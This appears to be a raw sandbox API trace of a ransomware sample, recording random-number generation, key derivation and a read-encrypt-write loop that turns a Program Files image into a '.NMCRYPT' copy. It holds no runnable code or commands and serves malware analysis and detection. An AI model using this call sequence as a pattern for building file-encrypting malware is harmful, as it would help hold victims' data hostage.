[0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.360] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.361] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44498c | out: phHash=0x1d44498c) returned 1 [0166.361] CryptHashData (hHash=0x9ad278, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.361] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d444990 | out: phKey=0x1d444990*=0x9ad138) returned 1 [0166.361] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.361] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.361] wcslen (_String="\\\\?\\") returned 0x4 [0166.361] CryptDuplicateKey (in: hKey=0x9ad138, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad5b8) returned 1 [0166.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.361] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=26720) returned 1 [0166.361] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0166.362] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.363] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.363] GetLastError () returned 0x0 [0166.363] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.365] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.365] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.365] GetLastError () returned 0x0 [0166.365] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.365] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.365] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.365] GetLastError () returned 0x0 [0166.365] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.365] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.365] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.365] GetLastError () returned 0x0 [0166.365] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.365] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.365] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.365] GetLastError () returned 0x0 [0166.365] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.366] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.366] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.366] GetLastError () returned 0x0 [0166.366] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.366] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.366] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.366] GetLastError () returned 0x0 [0166.366] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.366] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.366] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.366] GetLastError () returned 0x0 [0166.366] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.366] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.366] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.366] GetLastError () returned 0x0 [0166.366] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.366] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.366] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.366] GetLastError () returned 0x0 [0166.366] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.366] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.367] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.367] GetLastError () returned 0x0 [0166.367] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.367] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.367] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.367] GetLastError () returned 0x0 [0166.367] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.367] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.367] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.367] GetLastError () returned 0x0 [0166.367] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.367] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.367] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.367] GetLastError () returned 0x0 [0166.367] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.367] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.367] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.367] GetLastError () returned 0x0 [0166.367] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.367] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.368] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.368] GetLastError () returned 0x0 [0166.368] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.368] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.368] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.368] GetLastError () returned 0x0 [0166.368] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.368] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.368] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.368] GetLastError () returned 0x0 [0166.368] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.368] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.368] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.368] GetLastError () returned 0x0 [0166.368] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.368] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.368] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.368] GetLastError () returned 0x0 [0166.368] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.368] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.368] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.368] GetLastError () returned 0x0 [0166.368] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.368] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.368] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.368] GetLastError () returned 0x0 [0166.369] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.369] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.369] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.369] GetLastError () returned 0x0 [0166.369] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.369] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.369] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.369] GetLastError () returned 0x0 [0166.369] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.369] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.369] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.369] GetLastError () returned 0x0 [0166.369] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.369] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.369] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.369] GetLastError () returned 0x0 